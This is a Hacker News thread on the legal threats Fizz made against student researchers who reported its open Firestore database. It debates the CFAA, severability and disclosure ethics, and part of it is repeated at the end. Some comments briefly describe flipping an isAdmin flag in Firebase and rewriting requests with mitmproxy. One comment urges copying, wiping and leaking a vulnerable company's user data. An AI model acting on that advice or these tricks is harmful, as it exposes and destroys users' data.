I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research.
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
I presume that the "limb" the EFF attorney went on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
I don't think you have the pattern of facts correct (unless you have access to more information than what is in linked the Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
I think intent matters for actually securing an indictment and conviction, if for example they can prove that you exfiled their user data (this happened to Weev who noticed an ordinal ID in a URL and enumerated all possible URLs) they could actually get the feds to bust you. But you're right, if they're big enough they could try to come after your regardless at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, then someone hacks it, I think by definition your are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you by definition, are allowed to.
We all here no, there is no such thing as something 100% secure, but if you're gonna go making wild claim, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why in both contracts and legal communication (particularly threatening one), there is little to no consequence for the writing party to get things right.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case and racking up legal fees the whole time. apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. Definitely not clearly false that there's no liability here. Probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure you still get some of that today. An especially old fashioned company, or in this case naive college students but overall things have shifted quite dramatically in favor of disclosure. Dedicated middle men who protect security researcher's identities, Large enterprises encouraging and celebrating disclosure, six figure bug bounties, even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare as they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact than in the actual courts you are guilty of a crime.
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford daily article has copies of the lawyer letters back and forth, they are intense - and we wouldn't be able to read them if the EFF didn't step up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
A few years ago I found that HelloTalk (a language learning pen-pal app) stored the actual GPS coordinates of users in a SQLite that you can find in your iOS backup. The maps in-app showed only a general location (pin disappeared at a certain zoom).
You could also bypass the filter preventing searching for over 18 if you are under/under if you are over, and paid-only filters like location, gender, etc. by rewriting the requests with a mitmproxy (paid status is not checked server-side).
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
IANL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
2. at a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. threatening to do a legal act is largely legal. it's not illegal to threaten reporting to the authorities, for instance.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure", knowing you are not secure, and your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.
Interesting. My school has a very similar platform, SideChat, which I doubt is much different. Makes me wonder how much they know about me, as I was permanently banned last year for questioning the validity of "gender-affirming care."
Fantastic for calling Fizz out. "Fizz did not protect their users’ data. What happened next?"
This isn't a "someone hacked them". It's that Fizz failed to do what they promised.
I'm still curious to hear if the vulnerability has been tested to see if it's been resolved.
I think in a follow-up article by the Stanford Daily they said the app creators have gotten a few million in funding and lots of professional help, including to fix security issues. Although it still looks like user data is not fully anonymized internally like they had previously claimed.
I think I might be a bit of an outlier on this, but I struggle to see the value of imposing an embargo date in a security disclosure unless it's sent to a large institution that is used to a formal process like that. In most cases, if you're trying to communicate to someone that you've found a vulnerability under the pretense that you're doing it for the greater good, why begin by the relationship with a deadline before you "go public?" Wouldn't that be something you do later on if it appears that they're just blowing you off and won't do anything about it?
I don't think this applies to the reporter in this case, but it does seem like there's a bit of a trend in security research lately to capitalize on the publicity of finding a vulnerability for one's own personal branding. That feels a bit disingenuous. Not that the appropriate response would be to threaten someone with legal action.
It doesn't give them any wiggle room to lead you on, it doesn't give you any wiggle room to say 'unacceptable or I blow the whistle tomorrow', it removes your judgement of the situation from the disclosure entirely. It is the safest option for people who are great at finding things worth disclosing but not so great at situation-judging.
It's not about personal branding, it's about protecting the users of the app. Either the app fixes the vulnerability so the users are no longer in danger, or the users are made aware that they are in danger.
Security researchers have a duty to users and industry first, then to the specific companies they are disclosing to. Most companies, without time pressure, do absolutely nil to fix the issues they are made aware of.
It's completely fine to discuss or request a different disclosure date when communicating with researchers. The delay is their protection against inaction.
Do you disagree that Users might be entitled to know when a corporation is misusing their private, sensitive information? What is ethical does not begin and end with the corporations best interest, the users whose private information is being mishandled are the victims here, let us not lose perspective.
> One Friday night, we decided to explore whether Fizz was really “100% secure” like they claimed. Well, dear reader, Fizz was not 100% secure. In fact, they hardly had any security protections at all.
It's practically a given that the actual security (or privacy) of a software is inversely proportional to its claimed security and how loud those claims are. Also, the companies that pay the least attention to security are always the ones who later, after the breach, say "We take security very seriously..."
There should be harsher penalties for lawyers like Hopkins & Carley for threatening security researchers and engaging in unprofessional conduct like this.
Anyone can make a threat. There's a bit of smarts needed to classify a "threat" as credible or not. Only really a law enforcement officer can credibly bring charges against you. Unfortunately, we live in a society where someone with more money than you can use the courts to harass you, so you even if you don't fear illegitimate felony charges, you can get pretty much get sued for any reason at any time, which brings with it consequences if you don't have a lawyer to deal with it. So I understand why someone might be scared in this situation, and luckily they were able to find someone to work with them, pro bono. I really wish the law had some pro-active mechanism for dealing with this type of legal bullying.
In my opinion, they went too far and exposed themselves by telling the company.
In all honesty, nothing good usually comes from that. If you wanted the truth to be exposed, they would have been better off exposing it anonymously to the company and/or public if needed.
It's one thing to happen upon a vulnerability in normal use and report it. It's a different beast to gain access to servers you don't own and start touching things.
The story has greatly reduced value without knowing who the individuals behind Fizz really are. So that we can avoid doing business with them. It would be different if Fizz was a product of a megacorporation.
“Keep calm” and “be responsible” and “speak to a lawyer” are things I class as common sense. The gold nugget I was looking for was the red flashing shipwreck bouy/marker over the names.
I realize it is quick to be against Fizz, but I thought ethical hacking required prior permission.
Am I to understand you can attempt to hack any computer to gain unauthorized access without prior approval? That doesn't seem legal at all.
Whether or not there was a vulnerability, was the action taken actually legal under current law? I don't see anything indicating for or against in the article. Just posturing that "ethical hacking" is good and saying you are secure when you aren't is bad. None of that seems relevant to the actual question of what the law says.
(a) There's no such thing as "ethical hacking" (that's an Orwellian term designed to imply that testing conducted in ways unfavorable to vendors is "unethical").
(b) You don't require permission to test software running on hardware you control (absent some contract that says otherwise).
(c) But you're right, in this case, the researchers presumably did need permission to conduct this kind of testing lawfully.
Ethically, they did the good thing by challenging the "100% secure" claim. Legally, they were hacking (without permission). Very high praise to the EFF for getting them out of trouble. Go donate.
Given the aggressive response from this company, it is less likely that it will become the target of any security researchers in the future (who wants the hassle ?). That by itself makes their app less secure in the long term. Also, who'd want to support founders with this "I will destroy you!, even though you helped me improve my system" mentality ? I wouldn't be surprised if this startup dies off from this info.
Kudos to Cooper, Miles and Aditya for seeing this through.
Alternatively, it will attract the attention of less-noble researchers who won't bother with responsible disclosure rules — they'll just leak data or tinker with the system. But I agree that well-intentioned security researchers will be less likely to look into this platform.
A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
They could threaten to report you to the police or such authorities, but they would have to turn over their evidence to them and to you and open all their relevant records to you via discovery.
> Get a lawyer
Yes, if they're seriously threatening legal action they already have one.
Yes, threatening to report is what was really happening here. But in their effort to scare us, they elided much of that process. From our perspective it was "watch out, you might face felony charges if you don't agree to silence".
> A private individual or company cannot file criminal/felony charges. Those are filed by a County Prosecutor, District Attorney, State Attorney, etc after being convinced of probable cause.
That's not true, depending on where you live in the US. Several states allow private citizens to file criminal charges with a magistrate. IIRC, NJ law allows actual private prosecution of criminal charges, subject to approval by a judge and prosecutor. I think that's a holdover from English common law.
Those classmates committed felony extortion with their threat, just as an aside.
That would've been a better legal threat to put on them as a offensive move, instead of using the EFF. "Sure you can attempt to have me jailed but your threat is clear-cut felony extortion. See you in the jail cell right there with me!"
> Stay calm. I can’t tell you how much I wanted to curse out the Fizz team over email. But no. We had to keep it professional — even as they resorted to legal scare tactics. Your goal when you get a legal threat is to stay out of trouble. To resolve the situation. That’s it. The temporary satisfaction of saying “fuck you” isn’t worth giving up the possibility of an amicable resolution.
Maybe it's because I'm getting old, but it would never cross my mind to take any of this personally.
If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
Being the "good guy" can sometimes be harder than being the "bad guy", but suppressing your emotions is a basic requirement for being either "guy".
Yup, that's it :) These kids are either in college or just graduated. They were smart enough to get themselves legal help before saying anything stupid, which is impressive. Cut them some slack!
> If they're this bad at security, this bad at marketing, and then respond to a fairly standard vulnerability disclosure with legal threats it's pretty clear they have no idea what they're doing.
And yet, according to the linked article in the Stanford Daily, they received $4.5 million in funding
Do you think that someone less ethically minded could have resolved the issue more simply by redirecting their landing page to a warning that the site was insecure and shutting it down incurring near zero personal risk of retaliation and letting people make an informed choice about continuing to use the site.
This is wholly and obviously illegal but so is the described ethical hacking. You have adopted a complex nuanced strategy to minimize harm to all parties. This is great morally but as far as I can tell its only meaningful legally insofar as it makes folks less likely to go after you nothing about it makes your obviously illegal actions legal so if you are going to openly flout the law it makes sense to put less of a target on your back while you are breaking the law.
Best advice I can give someone is never do security research for a company without expressed written consent to do so and document everything as agreed to.
Payouts for finding bugs when there isn't an already established process are either not going to be worth your time or will be seen as malicious activity.
Unless you're looking to earn a bounty, always disclose testing of this type anonymously. Clean device, clean wi-fi, new accounts. That way if they threaten you instead of thanking you you can just drop the exploit details publicly and wash your hands of it.
This sounds a lot less interesting than the title makes it out to be. Is the fact that it is a "classmate" really relevant? Would the events have happened differently if it was another company with no connection to the school?
In short, if they are a company and are not 100% secure and they say they are then they are committing fraud. The person doing the testing is providing the evidence for a legal case and no amount of legal threats change that.
The article asserts "there are an increasing number of resources available to good-faith security researchers who face legal threats". Is there an example of such, outside of the EFF? How do beginners find them?
Makes me so happy to know EFF and ethical hackers like this exist. I know they can’t test every app and every situation, but that there are hobbyists like this is such a testimony to humanity.
This isn't the first time a security research who's politely and confidentially disclosed a vulnerability has been threaned. There's an important lesson to glean from this.
The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and protect their anonymity while doing all 3 of these.
If these researchers had done (2) and (3) – and done so anonymously, that would have not only protected them from legal threats/harm, but also effectively killed off a company that shouldn't exist – since all of Buzz/Fizz users would likely abandon it as consequence.
> The next time someone discovers a company that has poor database security, they should, IMO: (1) make a full copy of confidential user data, (2) delete all data on the server, (3) publish confidential user data on some dumping site; and [4] protect their anonymity while doing all 3 of these.
Aaron Swartz only did (1). Failing at (4) didn't end so well for him.
I get that you're frustrated but encouraging others to make martyrs of themselves is cowardice. If some dumb kid tries this and their opsec isn't bulletproof, they're fucked. Put your own skin in the game and do it yourself if your convictions are that strong.
So your solution for possibly being prosecuted for something marginal is to do several things for which it would be much more reasonable to be prosecuted? That seems like a rather unwise solution to the problem.
It's especially unwise because you now give the company a massive incentive to hire real forensics specialists to try to track you down. You're placing a lot of faith in your ability to remain anonymous under that level of scrutiny.
I'd suggest reading tptacek's comment: https://news.ycombinator.com/item?id=37298589 which does not 100% address your exact question, but gets close. As disclaimed, tptacek is not a lawyer, but has a lot of experience in this space and I'd still take it as a first pass answer.
Personally, I don't see it as worth it to pursue a company that does not hang out some sort of public permission to poke at them. The upside is minimal and the downside significant. Note this is a descriptive statement, not a normative statement. In a perfect world... well, in a perfect world there'd be no security vulnerabilities to find, but... in a perfect world sure you'd never get in trouble for poking through and immediately backing off, but in the real world this story just happens too often. Takes all the fun right out of it. YMMV.
> And then, one day, they sent us a threat. A crazy threat. I remember it vividly. I was just finishing a run when the email came in. And my heart rate went up after I stopped running. That’s not what’s supposed to happen. They said that we had violated state and federal law. They threatened us with civil and criminal charges. 20 years in prison. They really just threw everything they could at us. And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action. We had five days to respond.
This during a time when thousands or millions have their personal data leaked every other week, over and over, because companies don't want to cut into their profits.
Researchers who do the right thing face legal threats of 20 years in prison. Companies who cut corners on security face no consequences. This seems backwards.
Remember when a journalist pressed F12 and saw that a Missouri state website was exposing all the personal data of every teacher in the state (including SSN, etc). He reported the security flaw responsibly and it was embarrassing to the State so the Governor attacked him and legally harassed him. https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
I once saw something similar. A government website exposing the personal data of licensed medical professionals. A REST API responded with all their personal data (including SSN, address, etc), but the HTML frontend wouldn't display it. All the data was just an unauthenticated REST call away, for thousands of people in the state. What did I do? I just closed the tab and never touched the site again. It wasn't worth the personal risk to try to do the right thing so I just ignored it and for all I know all those people had their data stolen multiple times over because of this security flaw. I found the flaw as part of my job at the time, I don't remember the details anymore. It has probably been fixed by now. Our legal system made it a huge personal risk to do the right thing, so I didn't do the right thing.
Which brings me to my point. We need strong protections for those who expose security flaws in good faith. Even if someone is a grey hat and has done questionable things as part of their "research", as long as they report their security findings responsibly, they should be protected.
Why have we prioritized making things nice and convenient for the companies over all else? If every American's data gets stolen in a massive breach, it's so sad, but there's nothing we can do (shrug). If one curious user or security research pokes an app and finds a flaw, and they weren't authorized to do so, OMG!, that person needs to go to jail for decades, how dare they press F12!!!1
This is a national security issue. While we continue to see the same stories of massive breaches in the news over and over and over, and some of us get yet another free year of monitoring that credit agencies don't commit libel against us, just remember that we put the convenience of companies above all else. They get to opt-in to having their security tested, and over and over they fail us.
Protect security researchers, and make it legal to test the security of an app even if the owning company does not consent. </rant>
We need personal data protection laws in this country so that as an individual after a data breach at wherever I can personally sue them for damages. Potentially very significant damages if they leak a full dossier like a credit reporting agency.
If that happens the whole calculus of bug bounties changes immediately.
I understand there has been some progress on this front, but it's not nearly enough. We need stronger protections for whistleblowers and security researchers. Corporations and legislators wont write these laws for us because it's not particularly in their interest. Well, maybe senator Wyden and a few other highly ethical and tech savvy legislators well help, but the onus is on us as concerned citizens and perennial victims.
Perhaps before killing someone with a comment, you should provide examples to back up your vitriol? The guidelines were reposted a mere four days ago...
Yet another example of someone security "testing" someone else's servers/systems without permission. That's called hacking. Doesn't matter if you have "good faith" or not. It's not your property and you don't get to access it in ways the owners don't desire you to access it without being subject to potential civil and criminal enforcement against you.
Meanwhile companies leak the private data of millions of people and nothing happens.
If a curious kid does a port scan police will smash down doors. People will face decades in prison.
If a negligent company leaks the private data of every single American, well, gee, what could we have done more, we had that one company do an audit and they didn't find anything and, gee, we're just really sorry, so lets all move on and here's a free year of credit monitoring which you may choose to continue paying us for at the end of the free year.
Look at it from a consumer rights angle. A product is advertised as having some feature ("100% security" in this case), but nobody is allowed to test (even without causing any harm) if that is true.
It's effectively legalizing fraud for a big chunk of computer security. Sure fraud itself is technically still illegal, but so is exposing it.
As a user of the site who has been falsely assured that your data is "100% secure" and totally anonymous, is that data in fact not your property? Perhaps not in a strictly legal sense, but from an ethical standpoint it is certainly more of a grey area than corporations and their lawyers would want us to roll over and accept.
My understanding is that these security researchers only accessed their own accounts and data on the cloud servers, and in doing so they did not bypass any "effective technical protections on access."
Thankfully for all of us, the DoJ appears to disagree with your sentiment. At least with the current administration.
Is it your position is that when you are lied to, and your sensitive and personally identifying information is being grossly mishandled by a company, your only recourse is to spend thousands of dollars and incredible amounts of time on a court case that has very little chance of achieving anything?
tptacek|2 years ago
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database activity they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplating retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession fro the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
tptacek|2 years ago
https://www.justice.gov/opa/pr/department-justice-announces-...
AnthonyMouse|2 years ago
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
emilecantin|2 years ago
It reminds me of the case where AT&T had their iPad data subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
theptip|2 years ago
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
gsdofthewoods|2 years ago
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
mewse-hn|2 years ago
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
bawolff|2 years ago
Ignoring the legalities of it all, this step crosses a line morally imo.
shkkmo|2 years ago
